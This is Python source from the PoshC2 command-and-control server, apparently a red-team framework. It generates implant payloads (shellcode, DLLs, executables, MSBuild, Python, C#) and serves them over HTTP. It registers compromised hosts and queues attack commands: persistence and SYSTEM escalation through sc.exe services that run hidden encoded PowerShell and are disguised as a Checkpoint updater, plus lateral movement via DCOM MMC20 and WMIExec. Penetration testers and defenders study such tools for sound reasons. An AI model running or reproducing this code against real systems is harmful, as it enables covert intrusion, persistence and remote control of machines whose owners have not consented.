def do_createnewpayload(user, command, creds=None):
params = re.compile("createnewpayload ", re.IGNORECASE)
params = params.sub("", command)
creds = None
if "-credid" in params:
creds, params = get_creds_from_params(params, user)
if creds is None:
return
if not creds['Password']:
print_bad("This command does not support credentials with hashes")
input("Press Enter to continue...")
clear()
return
domain = input("Domain or URL: https://www.example.com ")
domainbase = (domain.lower()).replace('https://', '')
domainbase = domainbase.replace('http://', '')
domainfront = input("Domain front URL: e.g. fjdsklfjdskl.cloudfront.net ")
proxyurl = input("Proxy URL: .e.g. http://10.150.10.1:8080 ")
randomid = randomuri(5)
proxyuser = ""
proxypass = ""
credsexpire = ""
if proxyurl:
if creds is not None:
proxyuser = "******" % (creds['Domain'], creds['Username'])
proxypass = creds['Password']
else:
proxyuser = input(Colours.GREEN + "Proxy User: e.g. Domain\\user ")
proxypass = input("Proxy Password: e.g. Password1 ")
credsexpire = input(
Colours.GREEN +
"Password/Account Expiration Date: .e.g. 15/03/2018 ")
imurl = "%s?p" % get_newimplanturl()
domainbase = "Proxy%s%s" % (domainbase, randomid)
else:
domainbase = "%s%s" % (randomid, domainbase)
imurl = get_newimplanturl()
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], domain, domainfront, C2[8], proxyuser,
proxypass, proxyurl, "", "", C2[19], C2[20], C2[21],
imurl, PayloadsDirectory)
newPayload.CreateRaw("%s_" % domainbase)
newPayload.CreateDlls("%s_" % domainbase)
newPayload.CreateShellcode("%s_" % domainbase)
newPayload.CreateEXE("%s_" % domainbase)
newPayload.CreateMsbuild("%s_" % domainbase)
newPayload.CreatePython("%s_" % domainbase)
newPayload.CreateCS("%s_" % domainbase)
new_urldetails(randomid, domain, domainfront, proxyurl, proxyuser,
proxypass, credsexpire)
print_good("Created new payloads")
input("Press Enter to continue...")
clear()
def do_createdaisypayload(user, command):
name = input(Colours.GREEN + "Daisy name: e.g. DC1 ")
domain = input("Domain or URL: https://www.example.com ")
daisyurl = input("Daisy host: .e.g. http://10.150.10.1 ")
if (daisyurl == "http://127.0.0.1"):
daisyurl = "http://localhost"
if (daisyurl == "https://127.0.0.1"):
daisyurl = "https://localhost"
daisyport = input("Daisy port: .e.g. 8888 ")
daisyhostid = input("Select Daisy Implant Host: e.g. 5 ")
daisyhost = get_implantbyid(daisyhostid)
proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}"
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], daisyurl, "", daisyport, "", "", "",
"", proxynone, C2[19], C2[20],
C2[21], "%s?d" % get_newimplanturl(), PayloadsDirectory)
newPayload.PSDropper = (newPayload.PSDropper).replace("$pid;%s" % (daisyurl + ":" + daisyport), "$pid;%s@%s" % (daisyhost[11], daisyhost[3]))
newPayload.CreateRaw(name)
newPayload.CreateDlls(name)
newPayload.CreateShellcode(name)
newPayload.CreateEXE(name)
newPayload.CreateMsbuild(name)
newPayload.CreateCS(name)
new_urldetails(name, C2[1], C2[3], domain, daisyurl, daisyhostid, "")
print_good("Created new %s daisy payloads" % name)
input("Press Enter to continue...")
clear()
def do_install_servicelevel_persistencewith(user, command, randomuri):
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
"", "", "", "", C2[19], C2[20],
C2[21], get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
cmd = "sc.exe create CPUpdater binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceUpdater start= auto" % (payload)
new_task(cmd, user, randomuri)
def do_invoke_dcompayload(user, command, randomuri):
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
"", "", "", "", C2[19], C2[20],
C2[21], get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
p = re.compile(r'(?<=-target.).*')
target = re.search(p, command).group()
pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\\Windows\\System32\\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target, payload)
new_task(pscommand, user, randomuri)
def do_invoke_wmipayload(user, command, randomuri):
check_module_loaded("Invoke-WMIExec.ps1", randomuri, user)
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
"", "", "", "", C2[19], C2[20],
C2[21], get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
params = re.compile("invoke-wmipayload ", re.IGNORECASE)
params = params.sub("", command)
cmd = "invoke-wmiexec %s -command \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % (params, payload)
new_task(cmd, user, randomuri)
def do_get_system(user, command, randomuri):
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "", "",
"", "", "", C2[19], C2[20], C2[21],
get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
cmd = "sc.exe create CPUpdaterMisc binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceModule start= auto" % payload
new_task(cmd, user, randomuri)
cmd = "sc.exe start CPUpdaterMisc"
new_task(cmd, user, randomuri)
cmd = "sc.exe delete CPUpdaterMisc"
new_task(cmd, user, randomuri)
def do_get_system_withproxy(user, command, randomuri):
C2 = get_c2server_all()
if C2[11] == "":
print_bad("Need to run createproxypayload first")
return
else:
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20], C2[21],
"%s?p" % get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
cmd = "sc.exe create CPUpdaterMisc binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceModule start= auto" % payload
new_task(cmd, user, randomuri)
cmd = "sc.exe start CPUpdaterMisc"
new_task(cmd, user, randomuri)
cmd = "sc.exe delete CPUpdaterMisc"
new_task(cmd, user, randomuri)
def do_invoke_runasproxypayload(user, command, randomuri):
C2 = get_c2server_all()
if C2[11] == "":
print_bad("Need to run createproxypayload first")
return
else:
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20],
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
proxyvar = "$proxypayload = \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % payload
new_task(proxyvar, user, randomuri)
check_module_loaded("Invoke-RunAs.ps1", randomuri, user)
check_module_loaded("NamedPipeProxy.ps1", randomuri, user)
params = re.compile("invoke-runasproxypayload ", re.IGNORECASE)
params = params.sub("", command)
pipe = "add-Type -assembly System.Core; $pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMSProxy'); $pi.Connect(); $pr = new-object System.IO.StreamReader($pi); iex $pr.ReadLine();"
pscommand = "invoke-runas %s -command C:\\Windows\\System32\\WindowsPowershell\\v1.0\\powershell.exe -Args \" -e %s\"" % (params, base64.b64encode(pipe.encode('UTF-16LE')).decode("utf-8"))
new_task(pscommand, user, randomuri)
def do_createproxypayload(user, command, creds=None):
params = re.compile("createproxypayload ", re.IGNORECASE)
params = params.sub("", command)
creds = None
if "-credid" in params:
creds, params = get_creds_from_params(params, user)
if creds is None:
return
if not creds['Password']:
print_bad("This command does not support credentials with hashes")
input("Press Enter to continue...")
clear()
return
if creds is not None:
proxyuser = "******" % (creds['Domain'], creds['Username'])
proxypass = creds['Password']
else:
proxyuser = input(Colours.GREEN + "Proxy User: e.g. Domain\\user ")
proxypass = input("Proxy Password: e.g. Password1 ")
proxyurl = input(Colours.GREEN +
"Proxy URL: .e.g. http://10.150.10.1:8080 ")
credsexpire = input("Password/Account Expiration Date: .e.g. 15/03/2018 ")
update_item("ProxyURL", "C2Server", proxyurl)
update_item("ProxyUser", "C2Server", proxyuser)
update_item("ProxyPass", "C2Server", proxypass)
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12], C2[13],
C2[11], "", "", C2[19], C2[20], C2[21],
"%s?p" % get_newimplanturl(), PayloadsDirectory)
newPayload.CreateRaw("Proxy")
newPayload.CreateDlls("Proxy")
newPayload.CreateShellcode("Proxy")
newPayload.CreateEXE("Proxy")
newPayload.CreateMsbuild("Proxy")
newPayload.CreateCS("Proxy")
new_urldetails("Proxy", C2[1], C2[3], proxyurl, proxyuser, proxypass,
credsexpire)
print_good("Created new proxy payloads")
input("Press Enter to continue...")
clear()
def do_GET(self):
"""Respond to a GET request."""
logging.info("GET request,\nPath: %s\nHeaders:\n%s\n", str(self.path), str(self.headers))
new_implant_url = get_newimplanturl()
self.cookieHeader = self.headers.get('Cookie')
QuickCommandURI = select_item("QuickCommand", "C2Server")
UriPath = str(self.path)
sharpurls = get_sharpurls().split(",")
sharplist = []
for i in sharpurls:
i = i.replace(" ", "")
i = i.replace("\"", "")
sharplist.append("/" + i)
self.server_version = ServerHeader
self.sys_version = ""
if not self.cookieHeader:
self.cookieHeader = "NONE"
# implant gets a new task
new_task = newTask(self.path)
if new_task:
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(new_task)
elif [ele for ele in sharplist if(ele in UriPath)]:
try:
open("%swebserver.log" % PoshProjectDirectory, "a").write("%s - [%s] Making GET connection to SharpSocks %s%s\r\n" % (self.address_string(), self.log_date_time_string(), SocksHost, UriPath))
r = Request("%s%s" % (SocksHost, UriPath), headers={'Accept-Encoding': 'gzip', 'Cookie': '%s' % self.cookieHeader, 'User-Agent': UserAgent})
res = urlopen(r)
sharpout = res.read()
self.send_response(200)
self.send_header("Content-type", "text/html")
self.send_header("Connection", "close")
self.send_header("Content-Length", len(sharpout))
self.end_headers()
if (len(sharpout) > 0):
self.wfile.write(sharpout)
except HTTPError as e:
self.send_response(e.code)
self.send_header("Content-type", "text/html")
self.send_header("Connection", "close")
self.end_headers()
open("%swebserver.log" % PoshProjectDirectory, "a").write("[-] Error with SharpSocks - is SharpSocks running %s%s\r\n%s\r\n" % (SocksHost, UriPath, traceback.format_exc()))
open("%swebserver.log" % PoshProjectDirectory, "a").write("[-] SharpSocks %s\r\n" % e)
except Exception as e:
open("%swebserver.log" % PoshProjectDirectory, "a").write("[-] Error with SharpSocks - is SharpSocks running %s%s \r\n%s\r\n" % (SocksHost, UriPath, traceback.format_exc()))
open("%swebserver.log" % PoshProjectDirectory, "a").write("[-] SharpSocks %s\r\n" % e)
print(Colours.RED + "Error with SharpSocks or old implant connection - is SharpSocks running" + Colours.END)
print(Colours.RED + UriPath + Colours.END)
self.send_response(404)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(bytes(HTTPResponse, "utf-8"))
elif ("%s_bs" % QuickCommandURI) in self.path:
filename = "%spayload.bat" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(content)
elif ("%s_rg" % QuickCommandURI) in self.path:
filename = "%srg_sct.xml" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(content)
elif ("%ss/86/portal" % QuickCommandURI) in self.path:
filename = "%sSharp_v4_x86_Shellcode.bin" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
content = base64.b64encode(content)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(content)
elif ("%ss/64/portal" % QuickCommandURI) in self.path:
filename = "%sSharp_v4_x64_Shellcode.bin" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
content = base64.b64encode(content)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(content)
elif ("%sp/86/portal" % QuickCommandURI) in self.path:
filename = "%sPosh_v4_x86_Shellcode.bin" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
content = base64.b64encode(content)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(content)
elif ("%sp/64/portal" % QuickCommandURI) in self.path:
filename = "%sPosh_v4_x64_Shellcode.bin" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
content = base64.b64encode(content)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(content)
elif ("%s_cs" % QuickCommandURI) in self.path:
filename = "%scs_sct.xml" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(content)
elif ("%s_py" % QuickCommandURI) in self.path:
filename = "%saes.py" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
content = "a" + "".join("{:02x}".format(c) for c in content)
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write(bytes(content, "utf-8"))
elif ("%s_ex86" % QuickCommandURI) in self.path:
filename = "%sPosh32.exe" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
self.send_response(200)
self.send_header("Content-type", "application/x-msdownload")
self.end_headers()
self.wfile.write(content)
elif ("%s_ex64" % QuickCommandURI) in self.path:
filename = "%sPosh64.exe" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
self.send_response(200)
self.send_header("Content-type", "application/x-msdownload")
self.end_headers()
self.wfile.write(content)
# register new implant
elif new_implant_url in self.path and self.cookieHeader.startswith("SessionID"):
implant_type = "PS"
if self.path == ("%s?p" % new_implant_url):
implant_type = "PS Proxy"
if self.path == ("%s?d" % new_implant_url):
implant_type = "PS Daisy"
if self.path == ("%s?m" % new_implant_url):
implant_type = "Python"
if self.path == ("%s?d?m" % new_implant_url):
implant_type = "Python Daisy"
if self.path == ("%s?p?m" % new_implant_url):
implant_type = "Python Proxy"
if self.path == ("%s?c" % new_implant_url):
implant_type = "C#"
if self.path == ("%s?d?c" % new_implant_url):
implant_type = "C# Daisy"
if self.path == ("%s?p?c" % new_implant_url):
implant_type = "C# Proxy"
if implant_type.startswith("C#"):
cookieVal = (self.cookieHeader).replace("SessionID=", "")
decCookie = decrypt(KEY, cookieVal)
IPAddress = "%s:%s" % (self.client_address[0], self.client_address[1])
Domain, User, Hostname, Arch, PID, Proxy = decCookie.split(";")
Proxy = Proxy.replace("\x00", "")
if "\\" in User:
User = User[User.index("\\") + 1:]
newImplant = Implant(IPAddress, implant_type, str(Domain), str(User), str(Hostname), Arch, PID, Proxy)
newImplant.save()
newImplant.display()
newImplant.autoruns()
responseVal = encrypt(KEY, newImplant.SharpCore)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(responseVal)
elif implant_type.startswith("Python"):
cookieVal = (self.cookieHeader).replace("SessionID=", "")
decCookie = decrypt(KEY, cookieVal)
IPAddress = "%s:%s" % (self.client_address[0], self.client_address[1])
User, Domain, Hostname, Arch, PID, Proxy = decCookie.split(";")
Proxy = Proxy.replace("\x00", "")
newImplant = Implant(IPAddress, implant_type, str(Domain), str(User), str(Hostname), Arch, PID, Proxy)
newImplant.save()
newImplant.display()
responseVal = encrypt(KEY, newImplant.PythonCore)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(responseVal)
else:
try:
cookieVal = (self.cookieHeader).replace("SessionID=", "")
decCookie = decrypt(KEY.encode("utf-8"), cookieVal)
decCookie = str(decCookie)
Domain, User, Hostname, Arch, PID, Proxy = decCookie.split(";")
Proxy = Proxy.replace("\x00", "")
IPAddress = "%s:%s" % (self.client_address[0], self.client_address[1])
if "\\" in str(User):
User = User[str(User).index('\\') + 1:]
newImplant = Implant(IPAddress, implant_type, str(Domain), str(User), str(Hostname), Arch, PID, Proxy)
newImplant.save()
newImplant.display()
newImplant.autoruns()
responseVal = encrypt(KEY, newImplant.PSCore)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(responseVal)
except Exception as e:
print("Decryption error: %s" % e)
traceback.print_exc()
self.send_response(404)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(bytes(HTTPResponse, "utf-8"))
else:
self.send_response(404)
self.send_header("Content-type", "text/html")
self.end_headers()
HTTPResponsePage = select_item("HTTPResponse", "C2Server")
if HTTPResponsePage:
self.wfile.write(bytes(HTTPResponsePage, "utf-8"))
else:
self.wfile.write(bytes(HTTPResponse, "utf-8"))
def main(args):
httpd = ThreadedHTTPServer((BindIP, BindPort), MyHandler)
try:
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
except Exception:
print("cls")
print(chr(27) + "[2J")
print(Colours.GREEN + logopic)
print(Colours.END + "")
if os.path.isfile(Database):
print(("Using existing project: %s" % PoshProjectDirectory) + Colours.GREEN)
database_connect()
C2 = get_c2server_all()
if ((C2[1] == PayloadCommsHost) and (C2[3] == DomainFrontHeader)):
qstart = "%squickstart.txt" % (PoshProjectDirectory)
if os.path.exists(qstart):
with open(qstart, 'r') as f:
print(f.read())
else:
print("Error: different IP so regenerating payloads")
if os.path.exists("%spayloads_old" % PoshProjectDirectory):
import shutil
shutil.rmtree("%spayloads_old" % PoshProjectDirectory)
os.rename(PayloadsDirectory, "%s:_old" % PoshProjectDirectory)
os.makedirs(PayloadsDirectory)
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], PayloadCommsHost, DomainFrontHeader, C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20], C2[21], get_newimplanturl(), PayloadsDirectory)
new_urldetails("updated_host", PayloadCommsHost, C2[3], "", "", "", "")
update_item("PayloadCommsHost", "C2Server", PayloadCommsHost)
update_item("QuickCommand", "C2Server", QuickCommand)
update_item("DomainFrontHeader", "C2Server", DomainFrontHeader)
newPayload.CreateRaw()
newPayload.CreateDlls()
newPayload.CreateShellcode()
newPayload.CreateSCT()
newPayload.CreateHTA()
newPayload.CreateCS()
newPayload.CreateMacro()
newPayload.CreateEXE()
newPayload.CreateMsbuild()
newPayload.CreatePython()
newPayload.WriteQuickstart(PoshProjectDirectory + 'quickstart.txt')
else:
print("Initializing new project folder and database" + Colours.GREEN)
print("")
directory = os.path.dirname(PoshProjectDirectory)
if not os.path.exists(PoshProjectDirectory): os.makedirs(PoshProjectDirectory)
if not os.path.exists(DownloadsDirectory): os.makedirs(DownloadsDirectory)
if not os.path.exists(ReportsDirectory): os.makedirs(ReportsDirectory)
if not os.path.exists(PayloadsDirectory): os.makedirs(PayloadsDirectory)
initializedb()
if not validate_sleep_time(DefaultSleep):
print(Colours.RED)
print("Invalid DefaultSleep in config, please specify a time such as 50s, 10m or 1h")
print(Colours.GREEN)
sys.exit(1)
setupserver(PayloadCommsHost, gen_key().decode("utf-8"), DomainFrontHeader, DefaultSleep, KillDate, HTTPResponse, PoshProjectDirectory, PayloadCommsPort, QuickCommand, DownloadURI, "", "", "", Sounds, ClockworkSMS_APIKEY, ClockworkSMS_MobileNumbers, URLS, SocksURLS, Insecure, UserAgent, Referrer, Pushover_APIToken, Pushover_APIUser, EnableNotifications)
rewriteFile = "%s/rewrite-rules.txt" % directory
print("Creating Rewrite Rules in: " + rewriteFile)
print("")
rewriteHeader = ["RewriteEngine On", "SSLProxyEngine On", "SSLProxyCheckPeerCN Off", "SSLProxyVerify none", "SSLProxyCheckPeerName off", "SSLProxyCheckPeerExpire off", "# Change IPs to point at C2 infrastructure below", "Define PoshC2 10.0.0.1", "Define SharpSocks 10.0.0.1"]
rewriteFileContents = rewriteHeader + urlConfig.fetchRewriteRules() + urlConfig.fetchSocksRewriteRules()
with open(rewriteFile, 'w') as outFile:
for line in rewriteFileContents:
outFile.write(line)
outFile.write('\n')
outFile.close()
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20],
C2[21], get_newimplanturl(), PayloadsDirectory)
new_urldetails("default", C2[1], C2[3], "", "", "", "")
newPayload.CreateRaw()
newPayload.CreateDlls()
newPayload.CreateShellcode()
newPayload.CreateSCT()
newPayload.CreateHTA()
newPayload.CreateCS()
newPayload.CreateMacro()
newPayload.CreateEXE()
newPayload.CreateMsbuild()
create_self_signed_cert(PoshProjectDirectory)
newPayload.CreatePython()
newPayload.WriteQuickstart(directory + '/quickstart.txt')
print("")
print("CONNECT URL: " + select_item("PayloadCommsHost", "C2Server") + get_newimplanturl() + Colours.GREEN)
print("WEBSERVER Log: %swebserver.log" % PoshProjectDirectory)
global KEY
KEY = get_baseenckey()
print("")
print(time.asctime() + " PoshC2 Server Started - %s:%s" % (BindIP, BindPort))
from datetime import date, datetime
killdate = datetime.strptime(C2[5], '%d/%m/%Y').date()
datedifference = number_of_days(date.today(), killdate)
if datedifference < 8:
print (Colours.RED+("\nKill Date is - %s - expires in %s days" % (C2[5],datedifference)))
else:
print (Colours.GREEN+("\nKill Date is - %s - expires in %s days" % (C2[5],datedifference)))
print(Colours.END)
protocol = urlparse(PayloadCommsHost).scheme
if protocol == 'https':
if (os.path.isfile("%sposh.crt" % PoshProjectDirectory)) and (os.path.isfile("%sposh.key" % PoshProjectDirectory)):
try:
httpd.socket = ssl.wrap_socket(httpd.socket, keyfile="%sposh.key" % PoshProjectDirectory, certfile="%sposh.crt" % PoshProjectDirectory, server_side=True, ssl_version=ssl.PROTOCOL_TLS)
except Exception:
httpd.socket = ssl.wrap_socket(httpd.socket, keyfile="%sposh.key" % PoshProjectDirectory, certfile="%sposh.crt" % PoshProjectDirectory, server_side=True, ssl_version=ssl.PROTOCOL_TLSv1)
else:
raise ValueError("Cannot find the certificate files")
c2_message_thread = threading.Thread(target=log_c2_messages, daemon=True)
c2_message_thread.start()
try:
httpd.serve_forever()
except (KeyboardInterrupt, EOFError):
httpd.server_close()
print(time.asctime() + " PoshC2 Server Stopped - %s:%s" % (BindIP, BindPort))
sys.exit(0)
